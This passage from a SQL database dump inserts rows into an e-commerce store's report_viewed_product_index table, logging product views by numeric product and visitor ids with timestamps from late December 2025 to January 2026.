(23911, NULL, NULL, 2064, 1, '2025-12-29 23:14:34'),
(23912, NULL, NULL, 2054, 1, '2025-12-30 00:35:32'),
(23913, NULL, NULL, 2054, 1, '2025-12-30 01:09:25'),
(23914, NULL, NULL, 2060, 1, '2025-12-30 01:36:38'),
(23915, NULL, NULL, 2053, 1, '2025-12-30 01:50:43'),
(23916, NULL, NULL, 2061, 1, '2025-12-30 02:49:22'),
(23917, NULL, NULL, 2063, 1, '2025-12-30 03:45:24'),
(23918, NULL, NULL, 2064, 1, '2025-12-30 05:36:05'),
(23919, NULL, NULL, 2064, 1, '2025-12-30 05:57:18'),
(23920, NULL, NULL, 2062, 1, '2025-12-30 06:12:39'),
(23921, NULL, NULL, 2060, 1, '2025-12-30 07:09:31'),
(23922, NULL, NULL, 2061, 1, '2025-12-30 07:24:10'),
(23923, NULL, NULL, 2061, 1, '2025-12-30 07:24:10'),
(23924, NULL, NULL, 2054, 1, '2025-12-30 09:52:48'),
(23925, NULL, NULL, 2063, 1, '2025-12-30 09:57:50'),
(23926, NULL, NULL, 2060, 1, '2025-12-30 13:47:55'),
(23927, NULL, NULL, 2064, 1, '2025-12-30 14:26:10'),
(23928, NULL, NULL, 2060, 1, '2025-12-30 15:53:48'),
(23929, NULL, NULL, 2054, 1, '2025-12-30 15:54:41'),
(23930, NULL, NULL, 2060, 1, '2025-12-30 16:21:38'),
(23931, NULL, NULL, 2062, 1, '2025-12-30 16:24:21'),
(23932, NULL, NULL, 2062, 1, '2025-12-30 16:25:08'),
(23933, NULL, NULL, 2062, 1, '2025-12-30 17:30:32'),
(23934, NULL, NULL, 2064, 1, '2025-12-30 17:31:54'),
(23935, NULL, NULL, 2054, 1, '2025-12-30 17:34:59'),
(23936, NULL, NULL, 2064, 1, '2025-12-30 18:19:41'),
(23937, NULL, NULL, 2054, 1, '2025-12-30 19:10:32'),
(23938, NULL, NULL, 2060, 1, '2025-12-30 20:02:49'),
(23939, NULL, NULL, 2063, 1, '2025-12-30 20:37:50'),
(23940, NULL, NULL, 2062, 1, '2025-12-30 22:33:20'),
(23941, NULL, NULL, 2059, 1, '2025-12-30 22:54:09'),
(23942, NULL, NULL, 2060, 1, '2025-12-30 23:21:53'),
(23943, NULL, NULL, 2064, 1, '2025-12-30 23:58:20'),
(23944, NULL, NULL, 2064, 1, '2025-12-31 00:05:41'),
(23945, NULL, NULL, 2061, 1, '2025-12-31 00:09:37'),
(23946, NULL, NULL, 2054, 1, '2025-12-31 01:19:38'),
(23947, NULL, NULL, 2058, 1, '2025-12-31 05:18:31'),
(23948, NULL, NULL, 2053, 1, '2025-12-31 07:31:48'),
(23949, NULL, NULL, 2062, 1, '2025-12-31 08:49:13'),
(23950, NULL, NULL, 2060, 1, '2025-12-31 09:03:57'),
(23951, NULL, NULL, 2060, 1, '2025-12-31 09:03:59'),
(23952, NULL, NULL, 2060, 1, '2025-12-31 09:24:34'),
(23953, NULL, NULL, 2061, 1, '2025-12-31 10:11:19'),
(23954, NULL, NULL, 2059, 1, '2025-12-31 10:11:49'),
(23955, NULL, NULL, 2058, 1, '2025-12-31 10:12:13'),
(23956, NULL, NULL, 2063, 1, '2025-12-31 10:12:17'),
(23957, NULL, NULL, 2060, 1, '2025-12-31 10:38:17'),
(23958, NULL, NULL, 2060, 1, '2025-12-31 10:38:20'),
(23959, NULL, NULL, 2061, 1, '2025-12-31 11:13:19'),
(23960, NULL, NULL, 2054, 1, '2025-12-31 13:18:27'),
(23961, NULL, NULL, 2054, 1, '2025-12-31 14:12:06'),
(23962, NULL, NULL, 2054, 1, '2025-12-31 15:05:54'),
(23963, NULL, NULL, 2060, 1, '2025-12-31 15:11:36'),
(23964, NULL, NULL, 2064, 1, '2025-12-31 15:32:38'),
(23965, NULL, NULL, 2062, 1, '2025-12-31 16:50:31'),
(23966, NULL, NULL, 2064, 1, '2025-12-31 17:08:33'),
(23967, NULL, NULL, 2059, 1, '2025-12-31 17:48:22'),
(23968, NULL, NULL, 2064, 1, '2025-12-31 18:05:50'),
(23969, NULL, NULL, 2059, 1, '2025-12-31 18:22:05'),
(23970, NULL, NULL, 2062, 1, '2025-12-31 18:23:45'),
(23971, NULL, NULL, 2064, 1, '2025-12-31 18:25:13'),
(23972, NULL, NULL, 2060, 1, '2025-12-31 19:28:43'),
(23973, NULL, NULL, 2061, 1, '2025-12-31 21:58:50'),
(23974, NULL, NULL, 2058, 1, '2025-12-31 22:55:19'),
(23975, NULL, NULL, 2054, 1, '2026-01-01 00:09:04'),
(23976, NULL, NULL, 2060, 1, '2026-01-01 00:27:17'),
(23977, NULL, NULL, 2064, 1, '2026-01-01 01:02:47'),
(23978, NULL, NULL, 2060, 1, '2026-01-01 01:09:33'),
(23979, NULL, NULL, 2054, 1, '2026-01-01 01:53:33'),
(23980, NULL, NULL, 2053, 1, '2026-01-01 03:07:09'),
(23981, NULL, NULL, 2063, 1, '2026-01-01 03:08:28'),
(23982, NULL, NULL, 2055, 1, '2026-01-01 03:08:48'),
(23983, NULL, NULL, 2062, 1, '2026-01-01 03:08:50'),
(23984, NULL, NULL, 2064, 1, '2026-01-01 03:09:01'),
(23985, NULL, NULL, 2061, 1, '2026-01-01 03:34:43'),
(23986, NULL, NULL, 2055, 1, '2026-01-01 03:47:58'),
(23987, NULL, NULL, 2054, 1, '2026-01-01 03:55:25'),
(23988, NULL, NULL, 2055, 1, '2026-01-01 06:55:16'),
(23989, NULL, NULL, 2060, 1, '2026-01-01 09:18:45'),
(23990, NULL, NULL, 2054, 1, '2026-01-01 10:13:44'),
(23991, NULL, NULL, 2058, 1, '2026-01-01 10:23:59'),
(23992, NULL, NULL, 2053, 1, '2026-01-01 11:00:20'),
(23993, NULL, NULL, 2060, 1, '2026-01-01 11:14:59'),
(23994, NULL, NULL, 2064, 1, '2026-01-01 11:35:46'),
(23995, NULL, NULL, 2060, 1, '2026-01-01 11:58:41'),
(23996, NULL, NULL, 2054, 1, '2026-01-01 12:34:45'),
(23997, NULL, NULL, 2064, 1, '2026-01-01 13:45:06'),
(23998, NULL, NULL, 2054, 1, '2026-01-01 14:10:21'),
(23999, NULL, NULL, 2064, 1, '2026-01-01 14:22:05'),
(24000, NULL, NULL, 2064, 1, '2026-01-01 15:41:01'),
(24001, NULL, NULL, 2062, 1, '2026-01-01 17:02:06'),
(24002, NULL, NULL, 2062, 1, '2026-01-01 17:02:35'),
(24003, NULL, NULL, 2064, 1, '2026-01-01 20:56:18'),
(24004, NULL, NULL, 2062, 1, '2026-01-01 22:43:10'),
(24005, NULL, NULL, 2061, 1, '2026-01-01 22:43:15'),
(24006, NULL, NULL, 2063, 1, '2026-01-01 22:43:22'),
(24007, NULL, NULL, 2054, 1, '2026-01-02 02:50:59'),
(24008, NULL, NULL, 2060, 1, '2026-01-02 03:36:36'),
(24009, NULL, NULL, 2064, 1, '2026-01-02 05:36:10'),
(24010, NULL, NULL, 2054, 1, '2026-01-02 06:05:07'),
(24011, NULL, NULL, 2062, 1, '2026-01-02 07:14:55'),
(24012, NULL, NULL, 2053, 1, '2026-01-02 08:02:25'),
(24013, NULL, NULL, 2058, 1, '2026-01-02 10:09:18'),
(24014, NULL, NULL, 2054, 1, '2026-01-02 10:31:03'),
(24015, NULL, NULL, 2064, 1, '2026-01-02 10:53:00'),
(24016, NULL, NULL, 2059, 1, '2026-01-02 11:13:02'),
(24017, NULL, NULL, 2060, 1, '2026-01-02 12:38:53'),
(24018, NULL, NULL, 2064, 1, '2026-01-02 13:10:22'),
(24019, NULL, NULL, 2062, 1, '2026-01-02 13:55:10'),
(24020, NULL, NULL, 2060, 1, '2026-01-02 13:57:43'),
(24021, NULL, NULL, 2054, 1, '2026-01-02 13:58:55'),
(24022, NULL, NULL, 2062, 1, '2026-01-02 15:18:13'),
(24023, NULL, NULL, 2059, 1, '2026-01-02 16:18:49'),
(24024, NULL, NULL, 2062, 1, '2026-01-02 16:20:59'),
(24025, NULL, NULL, 2061, 1, '2026-01-02 16:21:09'),
(24026, NULL, NULL, 2058, 1, '2026-01-02 16:22:07'),
(24027, NULL, NULL, 2063, 1, '2026-01-02 16:22:16'),
(24028, NULL, NULL, 2064, 1, '2026-01-02 16:38:25'),
(24029, NULL, NULL, 2058, 1, '2026-01-02 18:41:46'),
(24030, NULL, NULL, 2054, 1, '2026-01-02 18:46:08'),
(24031, NULL, NULL, 2062, 1, '2026-01-02 18:53:15'),
(24032, NULL, NULL, 2060, 1, '2026-01-02 19:23:04'),
(24033, NULL, NULL, 2064, 1, '2026-01-02 19:31:51'),
(24034, NULL, NULL, 2054, 1, '2026-01-02 21:44:55'),
(24035, NULL, NULL, 2062, 1, '2026-01-02 21:49:22'),
(24036, NULL, NULL, 2061, 1, '2026-01-02 22:55:00'),
(24037, NULL, NULL, 2054, 1, '2026-01-02 23:44:49'),
(24038, NULL, NULL, 2054, 1, '2026-01-03 00:07:35'),
(24039, NULL, NULL, 2064, 1, '2026-01-03 00:42:59'),
(24040, NULL, NULL, 2060, 1, '2026-01-03 02:04:07'),
(24041, NULL, NULL, 2054, 1, '2026-01-03 05:43:19'),
(24042, NULL, NULL, 2060, 1, '2026-01-03 06:47:25'),
(24043, NULL, NULL, 2059, 1, '2026-01-03 06:47:30'),
(24044, NULL, NULL, 2064, 1, '2026-01-03 07:29:26'),
(24045, NULL, NULL, 2063, 1, '2026-01-03 07:37:50'),
(24046, NULL, NULL, 2053, 1, '2026-01-03 11:01:48'),
(24047, 5817, 118, 2064, 1, '2026-01-03 11:02:46'),
(24048, NULL, NULL, 2063, 1, '2026-01-03 11:02:48'),
(24049, NULL, NULL, 2055, 1, '2026-01-03 11:05:47'),
(24050, NULL, NULL, 2062, 1, '2026-01-03 11:06:19'),
(24051, NULL, NULL, 2064, 1, '2026-01-03 11:11:29'),
(24052, NULL, NULL, 2064, 1, '2026-01-03 11:38:09'),
(24053, NULL, NULL, 2064, 1, '2026-01-03 11:38:19'),
(24054, NULL, NULL, 2060, 1, '2026-01-03 12:13:59'),
(24055, NULL, NULL, 2055, 1, '2026-01-03 12:22:10'),
(24056, NULL, NULL, 2064, 1, '2026-01-03 12:30:54'),
(24057, NULL, NULL, 2054, 1, '2026-01-03 12:36:55'),
(24058, NULL, NULL, 2053, 1, '2026-01-03 13:08:10'),
(24059, NULL, NULL, 2061, 1, '2026-01-03 13:30:45'),
(24060, NULL, NULL, 2054, 1, '2026-01-03 14:17:36'),
(24061, NULL, NULL, 2064, 1, '2026-01-03 14:34:38'),
(24062, NULL, NULL, 2060, 1, '2026-01-03 15:01:38'),
(24063, NULL, NULL, 2060, 1, '2026-01-03 15:01:40'),
(24064, NULL, NULL, 2060, 1, '2026-01-03 16:18:45'),
(24065, NULL, NULL, 2060, 1, '2026-01-03 16:18:49'),
(24066, NULL, NULL, 2064, 1, '2026-01-03 16:44:15'),
(24067, NULL, NULL, 2062, 1, '2026-01-03 17:01:56'),
(24068, NULL, NULL, 2062, 1, '2026-01-03 17:02:21'),
(24069, NULL, NULL, 2062, 1, '2026-01-03 17:09:43'),
(24070, NULL, NULL, 2064, 1, '2026-01-03 17:11:03'),
(24071, NULL, NULL, 2060, 1, '2026-01-03 17:11:04'),
(24072, NULL, NULL, 2054, 1, '2026-01-03 18:31:04'),
(24073, NULL, NULL, 2060, 1, '2026-01-03 19:32:08'),
(24074, NULL, NULL, 2064, 1, '2026-01-03 22:16:37'),
(24075, NULL, NULL, 2059, 1, '2026-01-03 22:44:29'),
(24076, NULL, NULL, 2061, 1, '2026-01-03 23:05:45'),
(24077, NULL, NULL, 2058, 1, '2026-01-03 23:15:21'),
(24078, NULL, NULL, 2055, 1, '2026-01-03 23:32:44'),
(24079, NULL, NULL, 2060, 1, '2026-01-04 00:43:17'),
(24080, NULL, NULL, 2064, 1, '2026-01-04 03:11:31'),
(24081, NULL, NULL, 2054, 1, '2026-01-04 03:40:15'),
(24082, NULL, NULL, 2060, 1, '2026-01-04 05:40:48'),
(24083, NULL, NULL, 2054, 1, '2026-01-04 05:51:04'),
(24084, NULL, NULL, 2061, 1, '2026-01-04 05:55:31'),
(24085, NULL, NULL, 2058, 1, '2026-01-04 05:56:11'),
(24086, NULL, NULL, 2060, 1, '2026-01-04 05:56:31'),
(24087, NULL, NULL, 2062, 1, '2026-01-04 05:56:50'),
(24088, NULL, NULL, 2059, 1, '2026-01-04 05:57:10'),
(24089, NULL, NULL, 2063, 1, '2026-01-04 06:03:08'),
(24090, NULL, NULL, 2064, 1, '2026-01-04 06:07:18'),
(24091, NULL, NULL, 2054, 1, '2026-01-04 06:07:38'),
(24092, NULL, NULL, 2055, 1, '2026-01-04 06:08:18'),
(24093, NULL, NULL, 2055, 1, '2026-01-04 07:21:52'),
(24094, NULL, NULL, 2054, 1, '2026-01-04 07:30:59'),
(24095, NULL, NULL, 2058, 1, '2026-01-04 07:32:02'),
(24096, NULL, NULL, 2053, 1, '2026-01-04 07:57:22'),
(24097, NULL, NULL, 2053, 1, '2026-01-04 08:06:22'),
(24098, NULL, NULL, 2064, 1, '2026-01-04 08:53:50'),
(24099, NULL, NULL, 2060, 1, '2026-01-04 10:26:44'),
(24100, NULL, NULL, 2061, 1, '2026-01-04 11:59:16'),
(24101, NULL, NULL, 2061, 1, '2026-01-04 11:59:17'),
(24102, NULL, NULL, 2062, 1, '2026-01-04 13:55:36'),
(24103, NULL, NULL, 2054, 1, '2026-01-04 13:59:50'),
(24104, NULL, NULL, 2059, 1, '2026-01-04 14:22:58'),
(24105, NULL, NULL, 2062, 1, '2026-01-04 14:38:44'),
(24106, NULL, NULL, 2060, 1, '2026-01-04 15:01:17'),
(24107, NULL, NULL, 2063, 1, '2026-01-04 15:08:25'),
(24108, NULL, NULL, 2058, 1, '2026-01-04 15:26:41'),
(24109, NULL, NULL, 2055, 1, '2026-01-04 16:04:00'),
(24110, NULL, NULL, 2062, 1, '2026-01-04 16:47:47'),
(24111, NULL, NULL, 2062, 1, '2026-01-04 16:48:43'),
(24112, NULL, NULL, 2061, 1, '2026-01-04 17:02:52'),
(24113, NULL, NULL, 2059, 1, '2026-01-04 17:24:01'),
(24114, NULL, NULL, 2062, 1, '2026-01-04 17:24:09'),
(24115, NULL, NULL, 2061, 1, '2026-01-04 17:24:11'),
(24116, NULL, NULL, 2058, 1, '2026-01-04 17:25:02'),
(24117, NULL, NULL, 2063, 1, '2026-01-04 17:25:25'),
(24118, NULL, NULL, 2064, 1, '2026-01-04 17:30:22'),
(24119, NULL, NULL, 2062, 1, '2026-01-04 17:32:11'),
(24120, NULL, NULL, 2060, 1, '2026-01-04 17:33:22'),
(24121, NULL, NULL, 2064, 1, '2026-01-04 17:53:09'),
(24122, NULL, NULL, 2060, 1, '2026-01-04 18:09:29'),
(24123, NULL, NULL, 2060, 1, '2026-01-04 18:22:02'),
(24124, NULL, NULL, 2063, 1, '2026-01-04 18:28:08'),
(24125, NULL, NULL, 2058, 1, '2026-01-04 18:43:50'),
(24126, NULL, NULL, 2054, 1, '2026-01-04 19:10:10'),
(24127, NULL, NULL, 2055, 1, '2026-01-04 19:14:54'),
(24128, NULL, NULL, 2061, 1, '2026-01-04 20:05:15'),
(24129, NULL, NULL, 2062, 1, '2026-01-04 20:32:09'),
(24130, NULL, NULL, 2061, 1, '2026-01-04 20:48:47'),
(24131, NULL, NULL, 2054, 1, '2026-01-04 21:15:26'),
(24132, NULL, NULL, 2054, 1, '2026-01-04 21:16:51'),
(24133, NULL, NULL, 2064, 1, '2026-01-04 21:17:04'),
(24134, NULL, NULL, 2055, 1, '2026-01-04 21:24:01'),
(24135, NULL, NULL, 2054, 1, '2026-01-04 21:25:33'),
(24136, NULL, NULL, 2059, 1, '2026-01-04 21:31:16'),
(24137, NULL, NULL, 2059, 1, '2026-01-04 21:37:33'),
(24138, NULL, NULL, 2064, 1, '2026-01-04 21:47:09'),
(24139, NULL, NULL, 2054, 1, '2026-01-04 21:59:39'),
(24140, NULL, NULL, 2055, 1, '2026-01-05 00:06:18'),
(24141, NULL, NULL, 2061, 1, '2026-01-05 00:57:05'),
(24142, NULL, NULL, 2055, 1, '2026-01-05 01:28:26'),
(24143, NULL, NULL, 2060, 1, '2026-01-05 05:33:22'),
(24144, NULL, NULL, 2061, 1, '2026-01-05 05:34:34'),
(24145, NULL, NULL, 2054, 1, '2026-01-05 06:16:17'),
(24146, NULL, NULL, 2064, 1, '2026-01-05 06:59:44'),
(24147, NULL, NULL, 2064, 1, '2026-01-05 08:29:22'),
(24148, NULL, NULL, 2054, 1, '2026-01-05 11:32:52'),
(24149, NULL, NULL, 2060, 1, '2026-01-05 12:37:03'),
(24150, NULL, NULL, 2060, 1, '2026-01-05 12:52:55'),
(24151, NULL, NULL, 2054, 1, '2026-01-05 13:07:46'),
(24152, NULL, NULL, 2062, 1, '2026-01-05 17:04:47'),
(24153, NULL, NULL, 2062, 1, '2026-01-05 17:05:17'),
(24154, NULL, NULL, 2064, 1, '2026-01-05 17:42:50'),
(24155, NULL, NULL, 2053, 1, '2026-01-05 18:57:25'),
(24156, NULL, NULL, 2064, 1, '2026-01-05 18:57:28'),
(24157, NULL, NULL, 2055, 1, '2026-01-05 18:58:10'),
(24158, NULL, NULL, 2063, 1, '2026-01-05 19:00:01'),
(24159, NULL, NULL, 2062, 1, '2026-01-05 19:01:28'),
(24160, NULL, NULL, 2064, 1, '2026-01-05 19:33:21'),
(24161, NULL, NULL, 2054, 1, '2026-01-05 19:39:46'),
(24162, NULL, NULL, 2058, 1, '2026-01-05 19:39:51'),
(24163, NULL, NULL, 2060, 1, '2026-01-05 21:05:43'),
(24164, NULL, NULL, 2061, 1, '2026-01-05 21:15:26'),
(24165, NULL, NULL, 2060, 1, '2026-01-05 21:46:46'),
(24166, NULL, NULL, 2054, 1, '2026-01-05 21:47:01'),
(24167, NULL, NULL, 2060, 1, '2026-01-05 22:19:21'),
(24168, NULL, NULL, 2064, 1, '2026-01-05 23:33:10'),
(24169, NULL, NULL, 2054, 1, '2026-01-05 23:37:43'),
(24170, NULL, NULL, 2053, 1, '2026-01-05 23:44:15'),
(24171, NULL, NULL, 2053, 1, '2026-01-06 01:59:18'),
(24172, NULL, NULL, 2054, 1, '2026-01-06 02:58:43'),
(24173, NULL, NULL, 2054, 1, '2026-01-06 04:21:47'),
(24174, NULL, NULL, 2064, 1, '2026-01-06 04:28:24'),
(24175, NULL, NULL, 2060, 1, '2026-01-06 04:34:34'),
(24176, NULL, NULL, 2062, 1, '2026-01-06 05:21:59'),
(24177, NULL, NULL, 2062, 1, '2026-01-06 05:22:05'),
(24178, NULL, NULL, 2061, 1, '2026-01-06 06:01:58'),
(24179, NULL, NULL, 2062, 1, '2026-01-06 07:16:33'),
(24180, NULL, NULL, 2053, 1, '2026-01-06 08:15:19'),
(24181, NULL, NULL, 2060, 1, '2026-01-06 08:42:01'),
(24182, NULL, NULL, 2055, 1, '2026-01-06 09:38:31'),
(24183, NULL, NULL, 2064, 1, '2026-01-06 10:49:42'),
(24184, NULL, NULL, 2054, 1, '2026-01-06 11:46:55'),
(24185, NULL, NULL, 2060, 1, '2026-01-06 12:19:27'),
(24186, NULL, NULL, 2064, 1, '2026-01-06 12:25:27'),
(24187, NULL, NULL, 2060, 1, '2026-01-06 13:42:51'),
(24188, NULL, NULL, 2060, 1, '2026-01-06 14:28:22'),
(24189, NULL, NULL, 2060, 1, '2026-01-06 14:33:36'),
(24190, NULL, NULL, 2060, 1, '2026-01-06 14:33:38'),
(24191, NULL, NULL, 2058, 1, '2026-01-06 15:39:33'),
(24192, NULL, NULL, 2060, 1, '2026-01-06 15:59:26'),
(24193, NULL, NULL, 2060, 1, '2026-01-06 15:59:28'),
(24194, NULL, NULL, 2061, 1, '2026-01-06 16:00:35'),
(24195, NULL, NULL, 2064, 1, '2026-01-06 17:50:15'),
(24196, NULL, NULL, 2054, 1, '2026-01-06 18:16:38'),
(24197, NULL, NULL, 2062, 1, '2026-01-06 18:37:36'),
(24198, NULL, NULL, 2064, 1, '2026-01-06 18:39:06'),
(24199, NULL, NULL, 2061, 1, '2026-01-06 21:47:37'),
(24200, NULL, NULL, 2059, 1, '2026-01-06 23:15:32'),
(24201, NULL, NULL, 2060, 1, '2026-01-07 00:01:21'),
(24202, NULL, NULL, 2059, 1, '2026-01-07 00:04:17'),
(24203, NULL, NULL, 2062, 1, '2026-01-07 00:05:26'),
(24204, NULL, NULL, 2061, 1, '2026-01-07 00:09:07'),
(24205, NULL, NULL, 2058, 1, '2026-01-07 00:13:31'),
(24206, NULL, NULL, 2063, 1, '2026-01-07 00:14:05'),
(24207, NULL, NULL, 2054, 1, '2026-01-07 01:09:01'),
(24208, NULL, NULL, 2064, 1, '2026-01-07 01:37:18'),
(24209, NULL, NULL, 2064, 1, '2026-01-07 02:09:09'),
(24210, NULL, NULL, 2064, 1, '2026-01-07 02:18:14'),
(24211, NULL, NULL, 2054, 1, '2026-01-07 02:24:16'),
(24212, NULL, NULL, 2055, 1, '2026-01-07 02:24:17'),
(24213, NULL, NULL, 2064, 1, '2026-01-07 02:24:23'),
(24214, NULL, NULL, 2063, 1, '2026-01-07 02:24:25'),
(24215, NULL, NULL, 2062, 1, '2026-01-07 02:24:26'),
(24216, NULL, NULL, 2060, 1, '2026-01-07 02:24:28'),
(24217, NULL, NULL, 2059, 1, '2026-01-07 02:24:30'),
(24218, NULL, NULL, 2061, 1, '2026-01-07 02:24:32'),
(24219, NULL, NULL, 2058, 1, '2026-01-07 02:24:34'),
(24220, NULL, NULL, 2062, 1, '2026-01-07 02:51:09'),
(24221, NULL, NULL, 2063, 1, '2026-01-07 03:02:41'),
(24222, NULL, NULL, 2054, 1, '2026-01-07 03:05:36'),
(24223, NULL, NULL, 2054, 1, '2026-01-07 03:07:48'),
(24224, NULL, NULL, 2060, 1, '2026-01-07 03:12:57'),
(24225, NULL, NULL, 2059, 1, '2026-01-07 03:24:17'),
(24226, NULL, NULL, 2062, 1, '2026-01-07 05:19:18'),
(24227, NULL, NULL, 2060, 1, '2026-01-07 05:27:00'),
(24228, NULL, NULL, 2054, 1, '2026-01-07 06:10:09'),
(24229, NULL, NULL, 2062, 1, '2026-01-07 08:29:21'),
(24230, NULL, NULL, 2054, 1, '2026-01-07 14:55:23'),
(24231, NULL, NULL, 2060, 1, '2026-01-07 15:29:25'),
(24232, NULL, NULL, 2064, 1, '2026-01-07 15:31:30'),
(24233, NULL, NULL, 2054, 1, '2026-01-07 15:37:18'),
(24234, NULL, NULL, 2060, 1, '2026-01-07 16:02:47'),
(24235, NULL, NULL, 2064, 1, '2026-01-07 16:13:36'),
(24236, NULL, NULL, 2062, 1, '2026-01-07 16:55:27'),
(24237, NULL, NULL, 2062, 1, '2026-01-07 16:55:48'),
(24238, NULL, NULL, 2060, 1, '2026-01-07 17:37:12'),
(24239, NULL, NULL, 2059, 1, '2026-01-07 17:43:04'),
(24240, NULL, NULL, 2060, 1, '2026-01-07 18:16:58'),
(24241, NULL, NULL, 2060, 1, '2026-01-07 21:28:09'),
(24242, NULL, NULL, 2064, 1, '2026-01-07 21:49:51'),
(24243, NULL, NULL, 2063, 1, '2026-01-07 22:00:55'),
(24244, 5902, 119, 2064, 1, '2026-01-07 23:05:38'),
(24245, NULL, NULL, 2064, 1, '2026-01-08 00:08:13'),
(24246, NULL, NULL, 2054, 1, '2026-01-08 00:15:20'),
(24247, NULL, NULL, 2060, 1, '2026-01-08 01:28:26'),
(24248, NULL, NULL, 2060, 1, '2026-01-08 01:45:28'),
(24249, NULL, NULL, 2064, 1, '2026-01-08 02:39:18'),
(24250, NULL, NULL, 2053, 1, '2026-01-08 03:11:27'),
(24251, NULL, NULL, 2064, 1, '2026-01-08 03:12:00'),
(24252, NULL, NULL, 2055, 1, '2026-01-08 03:12:02'),
(24253, NULL, NULL, 2063, 1, '2026-01-08 03:12:08'),
(24254, NULL, NULL, 2062, 1, '2026-01-08 03:16:34'),
(24255, NULL, NULL, 2055, 1, '2026-01-08 05:54:19'),
(24256, NULL, NULL, 2063, 1, '2026-01-08 06:31:55'),
(24257, NULL, NULL, 2063, 1, '2026-01-08 07:18:16'),
(24258, NULL, NULL, 2059, 1, '2026-01-08 07:45:01'),
(24259, NULL, NULL, 2061, 1, '2026-01-08 07:50:21'),
(24260, NULL, NULL, 2054, 1, '2026-01-08 08:31:48'),
(24261, NULL, NULL, 2064, 1, '2026-01-08 08:32:51'),
(24262, NULL, NULL, 2053, 1, '2026-01-08 08:36:55'),
(24263, NULL, NULL, 2053, 1, '2026-01-08 09:07:08'),
(24264, NULL, NULL, 2054, 1, '2026-01-08 10:29:03'),
(24265, NULL, NULL, 2060, 1, '2026-01-08 10:30:31'),
(24266, 5914, 120, 2064, 1, '2026-01-08 10:41:21'),
(24267, NULL, NULL, 2063, 1, '2026-01-08 10:50:07'),
(24268, NULL, NULL, 2062, 1, '2026-01-08 12:47:36'),
(24269, NULL, NULL, 2064, 1, '2026-01-08 15:04:06'),
(24270, NULL, NULL, 2063, 1, '2026-01-08 15:04:08'),
(24271, NULL, NULL, 2062, 1, '2026-01-08 15:04:11'),
(24272, NULL, NULL, 2062, 1, '2026-01-08 16:24:54'),
(24273, NULL, NULL, 2062, 1, '2026-01-08 16:25:22'),
(24274, NULL, NULL, 2064, 1, '2026-01-08 17:15:30'),
(24275, NULL, NULL, 2064, 1, '2026-01-08 18:13:26'),
(24276, NULL, NULL, 2054, 1, '2026-01-08 18:49:44'),
(24277, NULL, NULL, 2060, 1, '2026-01-08 18:59:46'),
(24278, NULL, NULL, 2060, 1, '2026-01-08 20:18:04'),
(24279, NULL, NULL, 2064, 1, '2026-01-08 20:18:15'),
(24280, NULL, NULL, 2062, 1, '2026-01-08 22:48:36'),
(24281, NULL, NULL, 2061, 1, '2026-01-08 22:48:40'),
(24282, NULL, NULL, 2063, 1, '2026-01-08 22:48:44'),
(24283, NULL, NULL, 2064, 1, '2026-01-09 00:19:27'),
(24284, NULL, NULL, 2060, 1, '2026-01-09 01:01:12'),
(24285, NULL, NULL, 2060, 1, '2026-01-09 01:10:05'),
(24286, NULL, NULL, 2059, 1, '2026-01-09 01:18:15'),
(24287, NULL, NULL, 2054, 1, '2026-01-09 03:00:48'),
(24288, NULL, NULL, 2059, 1, '2026-01-09 03:43:26'),
(24289, NULL, NULL, 2062, 1, '2026-01-09 03:44:00'),
(24290, NULL, NULL, 2061, 1, '2026-01-09 03:47:34'),
(24291, NULL, NULL, 2058, 1, '2026-01-09 03:48:25'),
(24292, NULL, NULL, 2063, 1, '2026-01-09 03:48:27'),
(24293, NULL, NULL, 2064, 1, '2026-01-09 03:51:02'),
(24294, NULL, NULL, 2054, 1, '2026-01-09 04:18:38'),
(24295, NULL, NULL, 2064, 1, '2026-01-09 05:12:44'),
(24296, NULL, NULL, 2055, 1, '2026-01-09 05:48:43'),
(24297, NULL, NULL, 2054, 1, '2026-01-09 06:55:04'),
(24298, NULL, NULL, 2061, 1, '2026-01-09 07:10:10'),
(24299, NULL, NULL, 2058, 1, '2026-01-09 08:46:19'),
(24300, NULL, NULL, 2060, 1, '2026-01-09 09:39:00'),
(24301, NULL, NULL, 2060, 1, '2026-01-09 09:39:03'),
(24302, NULL, NULL, 2054, 1, '2026-01-09 09:58:45'),
(24303, NULL, NULL, 2060, 1, '2026-01-09 11:31:18'),
(24304, NULL, NULL, 2060, 1, '2026-01-09 11:31:21'),
(24305, NULL, NULL, 2064, 1, '2026-01-09 12:54:02'),
(24306, NULL, NULL, 2060, 1, '2026-01-09 13:27:43'),
(24307, NULL, NULL, 2059, 1, '2026-01-09 13:57:34'),
(24308, NULL, NULL, 2054, 1, '2026-01-09 14:01:05'),
(24309, NULL, NULL, 2063, 1, '2026-01-09 14:17:35'),
(24310, NULL, NULL, 2063, 1, '2026-01-09 14:17:36'),
(24311, NULL, NULL, 2059, 1, '2026-01-09 14:17:45'),
(24312, NULL, NULL, 2054, 1, '2026-01-09 14:38:21'),
(24313, NULL, NULL, 2062, 1, '2026-01-09 16:22:29'),
(24314, NULL, NULL, 2062, 1, '2026-01-09 16:23:22'),
(24315, NULL, NULL, 2060, 1, '2026-01-09 17:28:55'),
(24316, NULL, NULL, 2054, 1, '2026-01-09 18:09:29'),
(24317, NULL, NULL, 2064, 1, '2026-01-09 18:31:20'),
(24318, NULL, NULL, 2062, 1, '2026-01-09 18:54:29'),
(24319, NULL, NULL, 2064, 1, '2026-01-09 18:55:52'),
(24320, NULL, NULL, 2064, 1, '2026-01-09 21:26:12');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(24321, NULL, NULL, 2054, 1, '2026-01-09 21:50:12'),
(24322, NULL, NULL, 2054, 1, '2026-01-09 22:25:46'),
(24323, NULL, NULL, 2060, 1, '2026-01-09 22:34:25'),
(24324, NULL, NULL, 2063, 1, '2026-01-09 23:24:07'),
(24325, NULL, NULL, 2064, 1, '2026-01-09 23:46:48'),
(24326, NULL, NULL, 2064, 1, '2026-01-10 00:32:48'),
(24327, NULL, NULL, 2064, 1, '2026-01-10 01:25:28'),
(24328, NULL, NULL, 2062, 1, '2026-01-10 01:54:01'),
(24329, NULL, NULL, 2060, 1, '2026-01-10 03:16:18'),
(24330, NULL, NULL, 2059, 1, '2026-01-10 07:14:19'),
(24331, NULL, NULL, 2060, 1, '2026-01-10 07:14:22'),
(24332, NULL, NULL, 2063, 1, '2026-01-10 07:17:47'),
(24333, NULL, NULL, 2063, 1, '2026-01-10 08:16:20'),
(24334, NULL, NULL, 2055, 1, '2026-01-10 08:31:42'),
(24335, NULL, NULL, 2064, 1, '2026-01-10 09:54:55'),
(24336, NULL, NULL, 2060, 1, '2026-01-10 10:11:49'),
